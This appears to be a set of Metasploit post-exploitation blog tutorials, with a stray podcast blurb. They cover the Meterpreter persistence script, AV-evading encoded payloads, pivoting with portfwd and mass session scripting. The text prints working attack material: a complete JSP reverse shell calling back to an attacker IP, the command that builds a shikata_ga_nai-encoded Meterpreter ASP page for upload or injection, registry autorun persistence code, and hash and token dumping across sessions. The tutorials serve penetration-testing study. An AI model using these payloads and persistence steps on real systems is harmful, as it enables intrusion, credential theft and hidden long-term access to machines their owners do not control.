One of the tasks once a pentester gains access to a system in retaining such access, for this HD Moore wrote a great Meterpreter script called persistence, this script is truly unique since it generates it own payload, uploads the payload and configures it in such a manner to provide the attacker with a way back in to the system.

To see the options available with this script just run the script with the –h option:

   1: meterpreter > run persistence -h

   2:  

   3: OPTIONS:

   4:  

   5:     -A        Automatically start a matching multi/handler to connect to the agent

   6:     -X        Automatically start the agent when the system boots

   7:     -h        This help menu

   8:     -i <opt>  The interval in seconds between each connection attempt

   9:     -p <opt>  The port on the remote host where Metasploit is listening

  10:     -r <opt>  The IP of the system running Metasploit listening for the connect back

I will discuss the options as they are executed in the code.

The first thing the code will do is generate the payload that will be used on the target machine, the code is as follows:

  1: #
  2: # Create the persistent VBS
  3: #
  4: 
  5: print_status("Creating a persistent agent: LHOST=#{rhost} LPORT=#{rport} (interval=#{delay} onboot=#{install})")
  6: pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
  7: pay.datastore['LHOST'] = rhost
  8: pay.datastore['LPORT'] = rport
  9: raw  = pay.generate
 10: 
 11: vbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
 12: print_status("Persistent agent script is #{vbs.length} bytes long")

The options used are:

Line 5 you see a message printed where we see the values of the variables that will be used . In line 6 we set an object that is our payload called pay and the payload specified is a reverse TCP Meterpreter payload, from lines 7 and 8 we set the variables for this specific payload and we generate a Raw payload. On line 11 we use the same calls used by msfencode to encode a vbs_loop payload and the delay is set. The generated vbscript is saved in the variable. Then on line 12 we print out the size of our payload. This code can be used to generate other payloads, to get a list in msfconsole run the irb command and in it you can execute the API call for framework.payloads to get the list or just run msfpayload –h. For the encodings I do suggest that you take a look at the code in msfencode to get other possible encodes and ideas for your own scripts

The next action taken is uploading the payload to the target system the code bellow shows how this script does it:

  1: #
  2: # Upload to the filesystem
  3: #
  4: 
  5: tempdir = client.fs.file.expand_path("%TEMP%")
  6: tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
  7: fd = client.fs.file.new(tempvbs, "wb")
  8: fd.write(vbs)
  9: fd.close
 10: 
 11: print_status("Uploaded the persistent agent to #{tempvbs}")

In line 5 we can see that the temp directory for the account under the Meterpreter is running under by expanding the Windows %TEMP% variable. In line 6 we append the temp directory to a randome generated file name and append the extension .vbs, the appending of the extension is very importantant since wscript and cscript in Windows depend on the extension so as to know how to parse the script and execute it. From line 7 to 9 we create the file directly on the target system and we write the content of the variable holding the vbs code in to the file and we close it, thus creating the script on the target.

The next step is to execute the vbs script. The code us shown bellow:

  1: #
  2: # Execute the agent
  3: #
  4: proc = session.sys.process.execute("wscript \"#{tempvbs}\"", nil, {'Hidden' => true})
  5: print_status("Agent executed with PID #{proc.pid}")

In line 4 we execute the script using wscript and we execute the process as hidden from the user on the box, in line 5 we print the PID (Process ID) for the process.

Lets take a look at the first option of –A this option will start a multi handler to receive the connection back from the payload this useful when the connection is back to the attacker machine one would set the connection on a different port and migrate such connection to a different process so in the case of process failure the connection to the target machine is not lost. The code to build this multi handler follows:

  1: #
  2: # Setup the multi/handler if requested
  3: #
  4: if(autoconn)
  5: 	mul = client.framework.exploits.create("multi/handler")
  6: 	mul.datastore['PAYLOAD']   = "windows/meterpreter/reverse_tcp"
  7: 	mul.datastore['LHOST']     = rhost
  8: 	mul.datastore['LPORT']     = rport
  9: 	mul.datastore['EXITFUNC']  = 'process'
 10: 	mul.datastore['ExitOnSession'] = false
 11: 
 12: 	mul.exploit_simple(
 13: 		'Payload'        => mul.datastore['PAYLOAD'],
 14: 		'RunAsJob'       => true
 15: 	)
 16: end

As it can be seen the code is extremely simple to read thus making it very re-usable for other scripts one might have, if you have used msfconsole before to build a multi handler this code merits little explanation. One could easily add a AutoRunScript after line 10 if one so wishes to have a custom one or set is as an option for the script it self.

If we selected the –X option to have the payload run when the computer start, then the code below is executed:

  1: #
  2: # Make the agent restart on boot
  3: #
  4: if(install)
  5: 	nam = Rex::Text.rand_text_alpha(rand(8)+8)
  6: 	print_status("Installing into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
  7: 	key = client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', KEY_WRITE)
  8: 	if(key)
  9: 		key.set_value(nam, session.sys.registry.type2str("REG_SZ"), tempvbs)
 10: 		print_status("Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
 11: 	else
 12: 		print_status("Error: failed to open the registry key for writing")
 13: 	end
 14: end

In line 5 we create a random number that will be used for the registry key that in line 7 will created in HKLM\Software\Microsoft\Windows\CurrentVersion\Run. In line 8 a REG_SZ value is created with the path to our script, if it fails we will be informed.

I tested this script in a series of system and I do have to say that what surprised me is that the first part ran with out a single problem on:

On all systems the Meterpreter was ran as System, Administrator, a user in the Users Group and the Network Service account

This where default systems and those that have UAC it was enabled.  Now on those systems where we set up the payload to run at start up only failed on those with UAC and running and not running as System, also failed on those running as Network Service and as a regular user in the Users group. I would also recommend that you take a look at the scheduleme script for others ideas for persistence and for privilege escalation in certain systems, it will also let you schedule it with more options, but it is also only present win Windows 2003 and present Windows versions and not in the Home Editions of Windows XP, it also suffers from the same limitation when UAC is enabled.

There are several flavors you can now export your payloads in Metasploit, making the insertion of them more and more flexible.  If we use the msfpayload command alone we can generate the following output of buffers for the Payloads:

The output for the programming languages can be used in exploit code being developed or inserted into programs, Raw can be passed to msfencode for further processing and the executable can be used to generate a single file executable that depending on the payload it will be the executable type created and Architecture.  Currently executables can be created for the following OS:

To get a list of all payloads and their description just run the program msfpayload wit the –h flag:

  1: ./msfpayload -h
  2: 
  3:     Usage: ./msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA>
  4: 
  5: Framework Payloads (198 total)
  6: ==============================
  7: 
  8:     Name                                             Description
  9:     ----                                             -----------
 10: ................
 11:     java/jsp_shell_bind_tcp                          Listen for a connection and spawn a command shell
 12:     java/jsp_shell_reverse_tcp                       Connect back to attacker and spawn a command shell
 13: 
 14: ................
 15:     php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
 16:     php/bind_php                                     Listen for a connection and spawn a command shell via php
 17:     php/download_exec                                Download an EXE from a HTTP URL and execute it
 18:     php/exec                                         Execute a single system command
 19:     php/reverse_perl                                 Creates an interactive shell via perl
 20:     php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
 21:     php/shell_findsock                               
 22: 				Spawn a shell on the established connection to
 23: 				the webserver.  Unfortunately, this payload
 24: 				leaves conspicuous evil-looking entries in the
 25: 				apache error logs, so it is probably a good idea
 26: 				to use a bind or reverse shell unless firewalls
 27: 				prevent them from working.  The issue this
 28: 				payload takes advantage of (CLOEXEC flag not set
 29: 				on sockets) appears to have been patched on the
 30: 				Ubuntu version of Apache and may not work on
 31: 				other Debian-based distributions.  Only tested on
 32: 				Apache but it might work on other web servers
 33: 				that leak file descriptors to child processes.

If we take a look at the snipped of output shown bellow you can see that several payloads are actually code that we can turn to code that can be placed in a web server for execution, the 2 types of payloads that allow us to do this are Java jsp and PHP code, just set the output to Raw and save the output to a file.

To get the list of options you just use the Summarize option.

  1: ./msfpayload java/jsp_shell_reverse_tcp S
  2: 
  3:        Name: Java JSP Command Shell, Reverse TCP Inline
  4:     Version: 7550
  5:    Platform: Windows, OSX, Linux, Unix, Solaris
  6:        Arch: java
  7: Needs Admin: No
  8:  Total size: 0
  9:        Rank: Normal
 10: 
 11: Provided by:
 12:   sf <stephen_fewer@harmonysecurity.com>
 13: 
 14: Basic options:
 15: Name   Current Setting  Required  Description
 16: ----   ---------------  --------  -----------
 17: LHOST                   yes       The local address
 18: LPORT  4444             yes       The local port
 19: SHELL  cmd.exe          yes       The system shell to use.
 20: 
 21: Description:
 22:   Connect back to attacker and spawn a command shell
 23: 

Lets generate a JSP file with some options so as to run it on a Windows server supporting JSP like an Oracle Application server

  1: ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.224,LPORT=8080 R > /tmp/reversejsp.jsp

if we now take a look at the code generated it will look like this:

  1: 
  2: 			<%@page import="java.lang.*"%>
  3: 			<%@page import="java.util.*"%>
  4: 			<%@page import="java.io.*"%>
  5: 			<%@page import="java.net.*"%>
  6: 
  7: 			<%
  8: 				class StreamConnector extends Thread
  9: 				{
 10: 					InputStream is;
 11: 					OutputStream os;
 12: 					  
 13: 					StreamConnector( InputStream is, OutputStream os )
 14: 					{
 15: 						this.is = is;
 16: 						this.os = os;
 17: 					}
 18: 							  
 19: 					public void run()
 20: 					{
 21: 						BufferedReader in  = null;
 22: 						BufferedWriter out = null;
 23: 						try
 24: 						{
 25: 							in  = new BufferedReader( new InputStreamReader( this.is ) );
 26: 							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
 27: 							char buffer[] = new char[8192];
 28: 							int length;
 29: 							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
 30: 							{
 31: 								out.write( buffer, 0, length );
 32: 								out.flush();
 33: 							}
 34: 						} catch( Exception e ){}
 35: 						try
 36: 						{
 37: 							if( in != null )
 38: 								in.close();
 39: 							if( out != null )
 40: 								out.close();
 41: 						} catch( Exception e ){}
 42: 					}
 43: 				}
 44: 
 45: 				try
 46: 				{
 47: 					Socket socket = new Socket( "192.168.1.224", 8080 );
 48: 					Process process = Runtime.getRuntime().exec( "cmd.exe" );
 49: 					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
 50: 					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
 51: 				} catch( Exception e ) {}
 52: 			%>
 53: 		

As it can be seen this is code where the code in lines 47 thru 50 is executing the cmd.exe command and piping the output thru a socket back to the attacker, the shell is also an option that can be changed to be /bin/bash if setting on a Linux host.

Now if we want other formats not included in msfpayload and we want to also obfuscate by encoding our payload so as to make it more difficult to detect by AV (Anti Virus) and HIPS (Host Intrusion Prevention System) we use the msfencode command:

  1: ./msfencode -h
  2: 
  3:     Usage: ./msfencode <options>
  4: 
  6: 
  7:     -a <opt>  The architecture to encode as
  8:     -b <opt>  The list of characters to avoid: '\x00\xff'
  9:     -c <opt>  The number of times to encode the data
 10:     -e <opt>  The encoder to use
 11:     -h        Help banner
 12:     -i <opt>  Encode the contents of the supplied file path
 13:     -l        List available encoders
 14:     -m <opt>  Specifies an additional module search path
 15:     -n        Dump encoder information
 16:     -o <opt>  The output file
 17:     -p <opt>  The platform to encode for
 18:     -s <opt>  The maximum size of the encoded data
 19:     -t <opt>  The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs, asp)
 20:     -x <opt>  Specify an alternate win32 executable template
 21: 
 

By piping the Raw output to msfencode we can manipulate even more the payload, some of the most used options are the following:

There are different encoding types and they are rated on their effectiveness, to get a list we use the –l option:

  1: ./msfencode -l
  2: 
  3: Framework Encoders
  4: ==================
  5: 
  6:     Name                    Rank       Description
  7:     ----                    ----       -----------
  8:     cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
  9:     cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
 10:     generic/none            normal     The "none" Encoder
 11:     mipsbe/longxor          normal     XOR Encoder
 12:     mipsle/longxor          normal     XOR Encoder
 13:     php/base64              normal     PHP Base64 encoder
 14:     ppc/longxor             normal     PPC LongXOR Encoder
 15:     ppc/longxor_tag         normal     PPC LongXOR Encoder
 16:     sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
 17:     x64/xor                 normal     XOR Encoder
 18:     x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
 19:     x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
 20:     x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
 21:     x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
 22:     x86/countdown           normal     Single-byte XOR Countdown Encoder
 23:     x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
 24:     x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
 25:     x86/nonalpha            low        Non-Alpha Encoder
 26:     x86/nonupper            low        Non-Upper Encoder
 27:     x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
 28:     x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
 29:     x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

The highest one rank is x86/shikata_ga_nai for X86 code, do notice that depending on the payload you must be careful that the encoding and the architecture for which you are generating the payload match.

In the format buffers we get the same as with msfpayload but we also get some very interesting ones like:

As it can be seen we have some very interesting options for outputting our code and delivering it to our targets.

Lets generate a Meterpreter payload, encoded several times and convert it to an ASP page:

  1: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.224,LPORT=993 R | ./msfencode -c 5 -e x86/shikata_ga_nai -a X86 -t asp > evilpage.asp
  2: [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
  3: 
  4: [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
  5: 
  6: [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
  7: 
  8: [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
  9: 
 10: [*] x86/shikata_ga_nai succeeded with size 426 (iteration=5

Now this ASP page can be uploaded to a web server or place inside the code of a valid ASP page thru injection.

One important note is the more you encode the bigger the file so keep that in mind if your delivery mechanism is affected by the size.

As it can be seen Metasploit gives a large set of formats to export our payloads thus giving greater flexibility on avenues of attack.

John analyzes Windows firewall logs, and they guys discuss yet even more mitigations that don't work, laugh at the "top 5 essential patches of 2009", and hacking ATMs.

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Metasploit is getting better every time I see the activity log. Meterpreter has been improving a lot lately, it is now encrypted, multithreaded, many obfuscation techniques against detection even from memory dumping and 64bit Windows support, one of the old feature that I was really looking forward to is a revamp of the Port Forward feature. To show off the improvements I will be running everything thru the setup as shown bellow. I will have a Meterpreter Reverse TCP connection from the Windows XP machine to my attackers box in my home network thru the 2 NAT firewalls in between.

So from the meterpreter session we first take a look at the options we have by running the command with the –h option.

   1: meterpreter > portfwd -h

   2: Usage: portfwd [-h] [add / delete / list] [args]

   3:  

   4:  

   5: OPTIONS:

   6:  

   7:     -L <opt>  The local host to listen on (optional).

   8:     -h        Help banner.

   9:     -l <opt>  The local port to listen on.

  10:     -p <opt>  The remote port to connect to.

  11:     -r <opt>  The remote host to connect to.

  12:  

  13: meterpreter > 

We can Add, Delete and List the relays we can build with the tool. Lets check on the machine we are connected to if Remote Desktop is enabled:

   1: meterpreter > execute -H -c -i -f cmd.exe

   2: Process 1436 created.

   3: Channel 4 created.

   4: Microsoft Windows XP [Version 5.1.2600]

   5: (C) Copyright 1985-2001 Microsoft Corp.

   6:  

   7: C:\Documents and Settings\labuser\Desktop>netstat -na | find "3389"

   8: netstat -na | find "3389"

   9:   TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING

  10:  

  11: C:\Documents and Settings\labuser\Desktop>

As we can see the port 3389 is open, if not we can use the getgui script, which can also create the port forward for us but for this example we will build it by hand, we issue the command as shown below:

   1: meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1

   2: [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389

   3: meterpreter > portfwd list

   4: 0: 0.0.0.0:3389 -> 127.0.0.1:3389

   5:  

   6: 1 total local port forwards.

   7: meterpreter > 

We set the local port to which we will connect to with the –l option, we set the remote port to which we will relay the connection to with the –p option and with the –r option we tell the Meterpreter process on the target host where to what address to relay the connection to, so we tell it to relay to it’s local address. We issue a list command to make sure the connection is present and we proceed to connect locally using the Terminal Server Client that comes with Ubuntu.

As you can see we have an RDP connection to the target machine. One important note on Windows 7, Windows Vista and Windows 2008 you can configure your RDP protocol to encrypt using TLS and only accept validated Certificates(kb895433 MSDN Blog), if this is part of a Group Policy it will have to be disabled or use the VNC payload.

If we take a look at the network that is behind the firewalls by doing a ping sweep using the netenum Meterpreter script we can see another host responding to ICMP packets, this host is the Windows 2003 server I have in my VMware Team. I would like to map the drive of that server and extract data from it.

   1: meterpreter > run netenum -ps -r 10.10.10.1/24

   2: [*] Network Enumerator Meterpreter Script 

   3: [*] Log file being saved in /root/.msf3/logs/netenum/192.168.1.138

   4: [*] Performing ping sweep for IP range 10.10.10.1/24

   5: [*]     10.10.10.1 host found

   6: [*]     10.10.10.242 host found

   7: [*]     10.10.10.248 host found

   8: meterpreter > 

We will do as if we cracked the password either thru a hashdump or we used incognito to impersonate a token and creat a domain account. We now set our relay for port 445 the Netbios over TCP and we make sure that for the –r option we specify the remote IP of the target that we want to connect to.

   1: meterpreter > portfwd add -l 445 -p 445 -r 10.10.10.248

   2: [*] Local TCP relay created: 0.0.0.0:445 <-> 10.10.10.248:445

   3: meterpreter > portfwd list

   4: 0: 0.0.0.0:3389 -> 127.0.0.1:3389

   5: 1: 0.0.0.0:445 -> 10.10.10.248:445

   6:  

   7: 2 total local port forwards.

   8: meterpreter > 

Once we make a connection remember to do a list of connections to make sure the connection was made. Now from Nautilus in Gnome on my Ubuntu box a do a Connection to a Server and specify my localhost address, that it is a Windows Share, the Share, Usename and click Connect, I will we asked for the password and click ok. 

When the connection is successfully made we will see that we have access to the C$ of the remote server thru the pivot on the Windowx XP host. In this same manner we can use other tools thru the pivot to connect, enumerate and exploit remote hosts.

Once we are done we must kill each pivot using the delete command an the local port.

   1: meterpreter > portfwd delete -l 445

   2: [*] Successfully stopped TCP relay on 0.0.0.0:445

   3: meterpreter > portfwd delete -l 3389

   4: [*] Successfully stopped TCP relay on 0.0.0.0:3389

   5: meterpreter > portfwd list

   6:  

   7: 0 total local port forwards.

   8: meterpreter > 

The Port forward command is working very reliably and brings a new level of flexibility to post exploitation using the Meterpreter.

If an attacker gains accesses to any asset in a network that asset becomes a lauchpad of attacks against the internal assets of the network, attacking printers, client systems and network infrastructure, here is where having a multi layer approach at defends with segmentation, proper policy, procedures and baselining of activities of all systems comes in to play so as to stop and/or detect this type of attacks. Almost all modern RAT (Remote Administration Tools) and Exploitation Payloads either being from Metasploit, Core, Canvas, Poison Ivy or others support this type of functionality so proper defends is key.

Metasploit recently added 2 new options to the sessions command in msfconsole. This 2 options are the ability to run commands on all open sessions and to run a Meterpreter script on all sessions that are of Meterpreter type. I consider this 2 options game changers when it comes to post exploitation since now one can run a command thru out a series of shells and be able to automate all sessions with Meterpreter at the same time.

Here is the output of the sessions command showing all options, the –c for the command execution and the –s for script execution.

msf exploit(handler) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions.
    -c <opt>  Run a command on all live sessions
    -d <opt>  Detach an interactive session
    -h        Help banner.
    -i <opt>  Interact with the supplied session identifier.
    -k <opt>  Terminate session.
    -l        List all active sessions.
    -q        Quiet mode.
    -s <opt>  Run a script on all live meterpreter sessions
    -v        List verbose fields.

msf exploit(handler) > 

Currently I have 5 session open to different systems all behind a series of firewalls that is why all sessions appear to come from a single IP.

msf exploit(handler) > sessions -l 

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441
  2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920
  3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396
  4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686
  5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197

msf exploit(handler) > 

Another very useful option that was added is the –v for verbose, this lets us know if the session was the result of an exploit, what exploit or received by Multi Handler.

msf exploit(handler) > sessions -v

Active sessions
===============

  Id  Description  Tunnel                                     Via
  --  -----------  ------                                     ---
  1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441  multi/handler
  2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920  multi/handler
  3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396   multi/handler
  4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686  multi/handler
  5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197  multi/handler

msf exploit(handler) > 

Here is the code that is executed when the –c option is ran:

  1: cmds.each do |cmd|
  2: 	framework.sessions.each_sorted do |s|
  3: 		session = framework.sessions.get(s)
  4: 		print_status("Running '#{cmd}' on session #{s} (#{session.tunnel_peer})")
  5: 		if (session.type == "meterpreter")
  6: 			c,args = cmd.split(' ', 2)
  7: 			begin
  8: 				process = session.sys.process.execute(c, args, {
  9: 						'Channelized' => true,
 10: 						'Hidden'      => true
 11: 					})
 12: 			rescue ::Rex::Post::Meterpreter::RequestError
 13: 				print_error("Failed: #{$!.class} #{$!}")
 14: 
 15: 			end
 16: 			print_line(process.channel.read) if process and process.channel
 17: 		elsif session.type == "shell"
 18: 			# Then it's a regular shell, just send the command
 19: 			# to the session's stdin.
 20: 			session.write_shell(cmd + "\n")
 21: 			# read_shell blocks with no timeout, so we wrap
 22: 			# it in a select in case there is no output
 23: 			# from the command
 24: 			if select([session.rstream],nil,nil,3)
 25: 				output = session.read_shell
 26: 				print_line(output)
 27: 			end
 28: 		end
 29: 		# If the session isn't a meterpreter or shell type, it
 30: 		# could be a VNC session (which can't run commands) or
 31: 		# something custom (which we don't know how to run
 32: 		# commands on), so don't bother.
 33: 	end
 34: end

As it can be seen in the line 1 and 2 all commands are iterated one by one against each available session, the in likes 5 and 17 the sessions are checked to see if each one either a Meterpreter shell or a simple command Shell, this means we can write plug-ins that can automate against both types of shell using this code as example. As it can be seen in line 8 the type of command that we can run is a system command so none of the other Meterpreter commands can be used. Also on important thing to notice is that the rules for operating in a shell apply so one must be careful not to run commands that can break a shell like WMIC or certain types of SC. Lets run the hostname command on all shells:

msf exploit(handler) > sessions -c hostname
[*] Running 'hostname' on session 1 (192.168.1.138:50441)
winxplab01

[*] Running 'hostname' on session 2 (192.168.1.138:54920)
win2k3lab01

[*] Running 'hostname' on session 3 (192.168.1.138:1396)
win701

[*] Running 'hostname' on session 4 (192.168.1.138:61686)
winvis01

[*] Running 'hostname' on session 5 (192.168.1.138:57197)
WIN-YR4V852V71Y

msf exploit(handler) > 

Now if we want to run commands with arguments we have to enclosed the command and the arguments in quotes, also remember that since this is ruby special characters must be escaped where it applies.  For example:

msf exploit(handler) > sessions -c 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'
[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 1 (192.168.1.138:50441)

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Microsoft Windows XP


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 2 (192.168.1.138:54920)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Microsoft Windows Server 2003


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 3 (192.168.1.138:1396)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Windows 7 Enterprise


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 4 (192.168.1.138:61686)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Windows Vista (TM) Enterprise


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 5 (192.168.1.138:57197)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Windows Server (R) 2008 Enterprise


msf exploit(handler) > 

The –s option for running script is also an important one that will allow an attacker to automate several actions against a large number of sessions. Here is where I see that several steps will have to be taken when writing scripts to be used with this option, this are:

• Proper logging of data will become very important do to the possibility that a large number of shells are processed.
• Logs should reference the host name or host local IP of a target since many systems are now behind NAT firewalls.
• Multi Threading will be of great importance since each session is handle sequentially so having Multi Threaded scripts will be a great time saver.
• Scripts should at least output the hostname so the attacker can now what host he is currently running the script against.
• At the moment the script must run without options.

Here is the code executed when executing this option:

  1: if (not script.nil?)
  2: 	print_status("Running script #{script} on all meterpreter sessions ...")
  3: 	framework.sessions.each_sorted do |s|
  4: 		if ((session = framework.sessions.get(s)))
  5: 			if (session.type == "meterpreter")
  6: 				print_status("Session #{s} (#{session.tunnel_peer}):")
  7: 				begin
  8: 					client = session
  9: 					client.execute_script(script, binding)
 10: 				rescue ::Exception => e
 11: 					log_error("Error executing script: #{e.class} #{e}")
 12: 				end
 13: 			end
 14: 		end
 15: 	end
 16: else
 17: 	print_error("No script specified!")
 18: end

As it can be seen in line 5 only the sessions that are of Meterpreter type are the ones that will be interacted with.

Here is a summarized version of running winenum:

   1: msf exploit(handler) > sessions -s winenum

   2: [*] Running script winenum on all meterpreter sessions ...

   3: [*] Session 1 (192.168.1.138:50441):

   4: [*] Running Windows Local Enumerion Meterpreter Script

   5: [*] New session on 192.168.1.138:50441...

   6: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/WINXPLAB01_20091225.4410-04411.txt

   7: [*] Checking if WINXPLAB01 is a Virtual Machine ........

   8: [*] BIOS Check Failed

   9: [*]     This is a VMWare virtual Machine

  10: [*] Running Command List ...

  11: [*]     running command cmd.exe /c set

  12: [*]     running command ipconfig /all

  13: ..........

  14: [*] Running WMIC Commands ....

  15: [*]     running command wmic computersystem list brief

  16: ..........

  17: [*] Extracting software list from registry

  18: [*] Dumping and Downloading the Registry entries for Configured Wireless Networks

  19: [*]     Exporting HKLM\Software\Microsoft\WZCSVC\Parameters\Interfaces

  20: [*]     Compressing key into cab file for faster download

  21: [*]     Downloading wlan_20091225.4410-04411.cab to -> /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/wlan_20091225.4410-04411.cab

  22: [*]     Deleting left over files

  23: [*] Dumping password hashes...

  24: [*] Hashes Dumped

  25: [*] Getting Tokens...

  26: [*] All tokens have been processed

  27: [*] Done!

  28: [*] Session 2 (192.168.1.138:54920):

  29: [*] Running Windows Local Enumerion Meterpreter Script

  30: [*] New session on 192.168.1.138:54920...

  31: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN2K3LAB01_20091225.4538-95293/WIN2K3LAB01_20091225.4538-95293.txt

  32: [*] Checking if WIN2K3LAB01 is a Virtual Machine ........

  33: [*]     This is a VMware Workstation/Fusion Virtual Machine

  34: [*] Running Command List ...

  35: [*]     running command cmd.exe /c set

  36: ..........

  37: [*] Running WMIC Commands ....

  38: [*]     running command wmic computersystem list brief

  39: ..........

  40: [*] Extracting software list from registry

  41: [*] Dumping password hashes...

  42: [*] Hashes Dumped

  43: [*] Getting Tokens...

  44: [*] All tokens have been processed

  45: [*] Done!

  46: [*] Session 3 (192.168.1.138:1396):

  47: [*] Running Windows Local Enumerion Meterpreter Script

  48: [*] New session on 192.168.1.138:1396...

  49: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN701_20091225.4637-88208/WIN701_20091225.4637-88208.txt

  50: [*] Checking if WIN701 is a Virtual Machine ........

  51: [*]     This is a VMware Workstation/Fusion Virtual Machine

  52: [*] Checking if UAC is enabled ...

  53: [*]     UAC is Enabled

  54: [*] Running Command List ...

  55: [*]     running command cmd.exe /c set

  56: ..........

  57: [*] Running WMIC Commands ....

  58: [*]     running command wmic computersystem list brief

  59: ..........

  60: [*] Extracting software list from registry

  61: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges

  62: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.

  63: [*] Getting Tokens...

  64: [*] Error Getting Tokens: Rex::TimeoutError Operation timed out.

  65: [*] Done!

  66: [*] Session 4 (192.168.1.138:61686):

  67: [*] Running Windows Local Enumerion Meterpreter Script

  68: [*] New session on 192.168.1.138:61686...

  69: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINVIS01_20091225.4927-83932/WINVIS01_20091225.4927-83932.txt

  70: [*] Checking if WINVIS01 is a Virtual Machine ........

  71: [*]     This is a VMware Workstation/Fusion Virtual Machine

  72: [*] Checking if UAC is enabled ...

  73: [*]     UAC is Enabled

  74: [*] Running Command List ...

  75: [*]     running command cmd.exe /c set

  76: ..........

  77: [*] Running WMIC Commands ....

  78: [*]     running command wmic computersystem list brief

  79: ..........

  80: [*] Extracting software list from registry

  81: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges

  82: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.

  83: [*] Getting Tokens...

  84: [*] All tokens have been processed

  85: [*] Done!

  86: [*] Session 5 (192.168.1.138:57197):

  87: [*] Running Windows Local Enumerion Meterpreter Script

  88: [*] New session on 192.168.1.138:57197...

  89: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN-YR4V852V71Y_20091225.5019-40179/WIN-YR4V852V71Y_20091225.5019-40179.txt

  90: [*] Checking if WIN-YR4V852V71Y is a Virtual Machine ........

  91: [*]     This is a VMware Workstation/Fusion Virtual Machine

  92: [*] Running Command List ...

  93: [*]     running command cmd.exe /c set

  94: ..........

  95: [*] Running WMIC Commands ....

  96: [*]     running command wmic computersystem list brief

  97: ..........

  98: [*] Extracting software list from registry

